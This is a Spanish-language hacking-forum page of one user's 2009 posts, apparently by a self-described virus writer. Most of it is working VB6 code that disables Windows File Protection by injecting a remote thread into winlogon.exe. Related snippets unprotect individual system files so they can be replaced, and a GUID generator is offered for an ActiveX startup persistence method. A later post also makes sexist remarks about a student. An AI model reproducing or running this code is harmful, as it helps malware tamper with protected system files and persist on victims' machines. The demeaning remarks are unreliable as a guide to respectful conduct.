elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
101  Programación / Programación Visual Basic / Re: [SRC] Deshabilitar WFP [Windows File Protection] en: 15 Febrero 2009, 01:37 am
si tambien habia hecho un code para chequear si un archivo estaba protegido, y tambien desproteger el archivo con SetSfcFileException que lo desprotege por un minuto

Código
  1. Private Declare Function SfcIsFileProtected Lib "sfc.dll" _
  2. (ByVal hRpc As Long, _
  3. ByVal ProtFileName As Long) As Long
  4.  
  5.  
  6. Public Function IsFileProtected(ByVal strFile As String) As Boolean
  7.  
  8.     Dim res         As Long
  9.  
  10.     res = SfcIsFileProtected(0, StrPtr(strFile))
  11.  
  12.     If res = 0 Then
  13.         IsFileProtected = False
  14.         Exit Function
  15.     Else
  16.         IsFileProtected = True
  17.         Exit Function
  18.     End If
  19.  
  20. End Function
  21.  
  22. Sub Main()
  23.     If IsFileProtected("C:\windows\system32\userinit.exe") Then MsgBox "WFP Protect This File"
  24. End Sub
  25.  


y esta para desprotegerlo por un minuto:

Código
  1. Option Explicit
  2. Private Declare Function SfcFileException Lib "sfc_os.dll"  _
  3. Alias "#5" (ByVal dwUnknown0 As Long, _ ByVal pwszFile As Long, _
  4. ByVal dwUnknown1 As Long) As Long
  5.  
  6. Function DisableWFP(strPath As String) As Boolean
  7.     On Error Resume Next
  8.     If SfcFileException(0, StrPtr(strPath), -1) <> 0 Then
  9.         DisableWFP = False
  10.         Exit Function
  11.     End If
  12.     'Aquí puedes colocar el code para reemplazar, eliminar o renombrar el file
  13.     DisableWFP = True
  14. End Function

 
102  Programación / Programación Visual Basic / Re: [SRC] Deshabilitar WFP [Windows File Protection] en: 15 Febrero 2009, 01:13 am
Hay un valor en el registro que servia para eso: "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Windows File Protection"  Value name: SFCDisable Value: 0xFFFFFF9D

Pero de esta forma ya no funciona.

saludos
103  Programación / Programación Visual Basic / Re: [SRC] Deshabilitar WFP [Windows File Protection] en: 14 Febrero 2009, 21:14 pm
No, solo si haces el scaneo de los archivos de sistema mediante el comando sfc /scannow, si no el sistema no se percata de los cambios. saludos Ok, se que se puede olvidar el TRUE, pero lo coloque alli para que se entendiera mejor el code.

saludos  ;D
104  Programación / Programación Visual Basic / [SRC] Deshabilitar WFP [Windows File Protection] en: 14 Febrero 2009, 18:26 pm
Esta técnica pone Fin al Hilo SFC Watcher que continuamente espera y responde a la notificación de cambio de directorio o acciones que se señalan.
Para ello SFC_OS.DLL  nos brinda una función sin nombre que podemos exportar con el  ordinal 2: SfcTerminateWatcherThread .. Esta API no acepta parámetros y hace exactamente lo que su nombre implica. Sin embargo, hay una sola manera de usar esta función: Esta debe ser invocada en el proceso que creó el SFC Watcher Thread: winlogon.exe.

Para ello debemos inyectar, y llamar a la función desde el propio Winlogon

Este code deja deshabilitada la Protección hasta el proximo reinicio. pudiendo de esta forma modificar los ficheros del sistema que protege WFP, espero les sea de utilidad.


Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module        : mDisableWFP
  3. ' Fecha         : 15/02/2009 12:10
  4. ' Autor         : XcryptOR
  5. ' Proposito     : Deshabilita la WFP (Windows File Protection)Hasta el proximo Reinicio
  6. ' SO            : Windows XP Sp1, Sp2, Sp3
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Declare Function OpenProcessToken Lib "advapi32.dll" ( _
  10. ByVal ProcessHandle As Long, _
  11. ByVal DesiredAccess As Long, _
  12. TokenHandle As Long) As Long
  13.  
  14. Declare Function CloseHandle Lib "kernel32.dll" ( _
  15. ByVal hObject As Long) As Long
  16.  
  17. Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
  18.  
  19. Declare Function AdjustTokenPrivileges Lib "advapi32.dll" ( _
  20. ByVal TokenHandle As Long, _
  21. ByVal DisableAllPrivileges As Long, _
  22. ByRef NewState As TOKEN_PRIVILEGES, _
  23. ByVal BufferLength As Long, _
  24. PreviousState As Any, _
  25. ReturnLength As Long) As Long
  26.  
  27. Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" ( _
  28. ByVal lpSystemName As String, _
  29. ByVal lpName As String, _
  30. lpLuid As LUID) As Long
  31.  
  32. Declare Function CreateToolhelp32Snapshot Lib "kernel32.dll" ( _
  33. ByVal dwFlags As Long, _
  34. ByVal th32ProcessID As Long) As Long
  35.  
  36. Declare Function Process32First Lib "kernel32.dll" ( _
  37. ByVal hSnapshot As Long, _
  38. lppe As PROCESSENTRY32) As Long
  39.  
  40. Declare Function Process32Next Lib "kernel32.dll" ( _
  41. ByVal hSnapshot As Long, _
  42. lppe As PROCESSENTRY32) As Long
  43.  
  44. Declare Function OpenProcess Lib "kernel32.dll" ( _
  45. ByVal dwDesiredAccess As Long, _
  46. ByVal bInheritHandle As Long, _
  47. ByVal dwProcessId As Long) As Long
  48.  
  49. Declare Function CreateRemoteThread Lib "kernel32.dll" ( _
  50. ByVal hProcess As Long, _
  51. ByRef lpThreadAttributes As Any, _
  52. ByVal dwStackSize As Long, _
  53. ByVal StartAddress As Long, _
  54. ByRef lpParameter As Any, _
  55. ByVal dwCreationFlags As Long, _
  56. ByRef lpThreadId As Long) As Long
  57.  
  58. Declare Function LoadLibrary Lib "kernel32.dll" Alias "LoadLibraryA" ( _
  59. ByVal lpLibFileName As String) As Long
  60.  
  61. Declare Function GetProcAddress Lib "kernel32.dll" ( _
  62. ByVal hModule As Long, _
  63. ByVal OrdinalNumber As Long) As Long
  64.  
  65. Declare Function FreeLibrary Lib "kernel32.dll" ( _
  66. ByVal hLibModule As Long) As Long
  67.  
  68. Declare Function WaitForSingleObject Lib "kernel32.dll" ( _
  69. ByVal hHandle As Long, _
  70. ByVal dwMilliseconds As Long) As Long
  71.  
  72. Const TOKEN_ALL_ACCESS = 983551
  73. Const PROCESS_ALL_ACCESS = &H1F0FFF
  74. Const TH32CS_SNAPPROCESS As Long = &H2
  75. Const INFINITE = &HFFFF&
  76.  
  77. Type LUID
  78.         LowPart             As Long
  79.         HighPart            As Long
  80. End Type
  81.  
  82. Type LUID_AND_ATTRIBUTES
  83.         pLuid               As LUID
  84.         Attributes          As Long
  85. End Type
  86.  
  87. Type TOKEN_PRIVILEGES
  88.         PrivilegeCount      As Long
  89.         Privileges(1)       As LUID_AND_ATTRIBUTES
  90. End Type
  91.  
  92. Type PROCESSENTRY32
  93.         dwSize              As Long
  94.         cntUsage            As Long
  95.         th32ProcessID       As Long
  96.         th32DefaultHeapID   As Long
  97.         th32ModuleID        As Long
  98.         cntThreads          As Long
  99.         th32ParentProcessID As Long
  100.         pcPriClassBase      As Long
  101.         dwFlags             As Long
  102.         szExeFile           As String * 260
  103. End Type
  104.  
  105. Sub Main()
  106.  
  107.     SetPrivilegies
  108.  
  109.     If DisableWFP = True Then
  110.         MsgBox "Se ha deshabilitado la WFP, hasta el proximo reinicio."
  111.     Else
  112.         MsgBox "Error al abrir winlogon! no se puede desactivar WFP"
  113.     End If
  114.  
  115.  
  116. End Sub
  117.  
  118. '==============================================================================
  119. '================ OBTENER PID (PROCESS ID) DEL NOMBRE =========================
  120. '==============================================================================
  121. Public Function GetPid(szProcess As String)
  122.     On Error Resume Next
  123.  
  124.     Dim Pid         As Long
  125.     Dim l           As Long
  126.     Dim l1          As Long
  127.     Dim l2          As Long
  128.     Dim Ol          As Long
  129.     Dim pShot       As PROCESSENTRY32
  130.  
  131.     l1 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
  132.     pShot.dwSize = Len(pShot)
  133.     l2 = Process32Next(l1, pShot)
  134.     Do While l2
  135.         If InStr(pShot.szExeFile, szProcess) <> 0 Then
  136.             Pid = pShot.th32ProcessID
  137.             GetPid = Pid
  138.         End If
  139.         l2 = Process32Next(l1, pShot)
  140.     Loop
  141.     l = CloseHandle(l1)
  142.  
  143. End Function
  144. '==============================================================================
  145. '=========================== OBTENER PRIVILEGIOS ==============================
  146. '==============================================================================
  147. Sub SetPrivilegies()
  148.  
  149.     Dim hToken      As Long
  150.     Dim pLuid       As LUID
  151.     Dim TokenPriv   As TOKEN_PRIVILEGES
  152.  
  153.     If OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, hToken) = 0 Then
  154.         End
  155.     End If
  156.  
  157.     LookupPrivilegeValue vbNullString, "SeDebugPrivilege", pLuid
  158.  
  159.     With TokenPriv
  160.         .PrivilegeCount = 1
  161.         .Privileges(0).pLuid = pLuid
  162.         .Privileges(0).Attributes = 2
  163.     End With
  164.  
  165.     AdjustTokenPrivileges hToken, 0, TokenPriv, Len(TokenPriv), ByVal 0&, ByVal 0&
  166.     CloseHandle hToken
  167.  
  168. End Sub
  169. '==============================================================================
  170. '==== DESHABILITAR LA WFP (WINDOWS FILE PROTECTION) HASTA PROXIMO REINICIO ====
  171. '==============================================================================
  172.  
  173. Function DisableWFP() As Boolean
  174.  
  175.     Dim LoadDll     As Long
  176.     Dim hProcess    As Long
  177.     Dim RemThread   As Long
  178.     Dim SfcTerminateWatcherThread  As Long
  179.  
  180.     hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPid("winlogon.exe"))
  181.  
  182.     If hProcess = 0 Then
  183.         DisableWFP = False
  184.         End
  185.     End If
  186.  
  187.     LoadDll = LoadLibrary("SFC_OS.DLL")          'sfc_os.dll
  188.     SfcTerminateWatcherThread = GetProcAddress(LoadDll, 2)      'Api SfcTerminateWatcherThread ordinal:#2 de sfc_os.dll
  189.     RemThread = CreateRemoteThread(hProcess, ByVal 0&, 0, ByVal SfcTerminateWatcherThread, ByVal 0&, 0, ByVal 0&)
  190.  
  191.     WaitForSingleObject RemThread, INFINITE
  192.     CloseHandle hProcess
  193.     FreeLibrary LoadDll
  194.     DisableWFP = True
  195.  
  196. End Function
  197.  
105  Programación / Programación Visual Basic / Re: Mandar la informacion de un texbox a un label en Visual basic6.0 en: 14 Febrero 2009, 02:44 am
naaaa ella no quiere aprender ella quieren que le hagan todo, conozco muchas como ella, se ponen a estudiar, terminan la carrera gracias a boludos como nosotros que les hacemos los trabajos, y despues no las encontramos y para colmo las nombran  como nuestro jefe.  :¬¬

Nadie nace sabiendo, pero por favor para algo asi, primero lee un manual y si ya no entiendes pide ayuda, ella como que coje su cuaderno, lee las preguntas que el profe le formulo para un ejercicio viene al foro, y una por una espera a que pelotudos como nosotros le respondamos, y al otro dia va al instituto y dice "mira , a que yo hice asi el ejercicio, soy lo maximo", jejeje, ya es hora de que borren estos post tan pendejos.  >:(
106  Programación / Programación Visual Basic / Re: Mandar la informacion de un Textbox o un msgbox en: 13 Febrero 2009, 18:15 pm
Cuando no se tiene nada bueno que decir es mejor cerrar la boca  :-X
107  Programación / Programación Visual Basic / Re: Mandar la informacion de un texbox a un label en Visual basic6.0 en: 13 Febrero 2009, 18:11 pm
estos post deberian ser borrados, esta sección no se usa para el intercambio de direcciones de correo  :P
Citar
Ay que lindo
 
Agregame a mi también, mi correo es...

P.D: y tampoco para que te hagan las tareas especialmente sin son tam basicas deberias esforzarte por pensar  :laugh:
108  Programación / Programación Visual Basic / Generador GUID en: 6 Febrero 2009, 15:42 pm
Code Util para utilizar el metodo de inicio ActiveX (ActiveX Startup Method), este code genera un numero unico de la forma: {89B4C1CD-B018-4511-B0A1-5476DBF70820}.
Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module      : mGenGUID
  3. ' Fecha       : 05/02/2009 18:10
  4. ' Autor       : XcryptOR
  5. ' Proposito   : Generar un número de identificación unico
  6. ' Creditos    : Creditos a trilithium, Autor del code original en Delphi
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Option Explicit
  10.  
  11. Private Type GUID
  12.     Data1           As Long
  13.     Data2           As Integer
  14.     Data3           As Integer
  15.     Data4(7)        As Byte
  16. End Type
  17.  
  18. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
  19. pDest As Any, _
  20. pSource As Any, _
  21. ByVal dwLength As Long)
  22.  
  23. Private Declare Function StringFromCLSID Lib "ole32" ( _
  24. pclsid As GUID, _
  25. lpsz As Long) As Long
  26.  
  27. Private Declare Function CoCreateGuid Lib "OLE32.DLL" (pGuid As GUID) As Long
  28.  
  29. Public Function GetGUID() As String
  30.     Dim udtGUID     As GUID
  31.     If (CoCreateGuid(udtGUID) = 0) Then
  32.         GetGUID = GUIDToStr(udtGUID)
  33.     End If
  34. End Function
  35.  
  36. Private Function GUIDToStr(ID As GUID) As String
  37.     Dim strRet      As String
  38.     Dim ptrSource   As Long
  39.     Dim lngRet      As Long
  40.  
  41.     strRet = Space(38)
  42.     lngRet = StringFromCLSID(ID, ptrSource)
  43.     If lngRet = 0 Then
  44.         CopyMemory ByVal StrPtr(strRet), ByVal ptrSource, 76
  45.         GUIDToStr = strRet
  46.     End If
  47. End Function
109  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 5 Febrero 2009, 15:33 pm
Citar
Disculpa. pero que necesita un usuario para poder dar su veredecito respecto a los antivirus? si solo aceptamos los puntos de vistas de moderadores y coolaboradores al foro quedaria de poos posts.

Mira es como hacer una encuesta de las mejores aspiradoras del mercado, yo de aspiradoras se lo mismo que de cocina nada, bueno y si miro la cochera en mi casa te diria que la mejor es la de mi cochera. es eso a lo que me refiero cuando se quiere hacer algo serio deberia ser hecho por personas idoneas en el tema. claro que toda opinion es valida pero para decidir en algo serio como la protección de un PC no lo creo. y si el nod y kav que estan en los primero puestos de verdad se lo merecen pero tambien hay productos super valorados como el Avg o el Avast, que son los free, y hay otros sub valorados como el avira, el bitdefender, entre otros.

muchas gracias
110  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 5 Febrero 2009, 03:35 am
por conocimiento de causa el mejor es el avira antivir y no lo digo yo un vx coder desconocido, aqui quienes me respaldan:

Link1
Link1
Link3


si quieren pueden googlear en consultoras serias. uno solo puede decir algo de un producto cuando lo ha evaluado muy bien y con referencia a otros producto, yo no puedo decir que el Nod es el mejor si solo he tenido instalado el Norton y el Nod. ademas deberia ser probado con muestras de malware "In the Heur".  numero de falsos positivos, autoprotección, tiempo de actualización de las definiciones con respecto al la fecha cuando aparecio el malware.

Esa es mi humilde opinion, ahh y no me parecen validas las respuestas en esta encuesta de los usuarios estandar "Usuarios Comunes"

Gracias
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines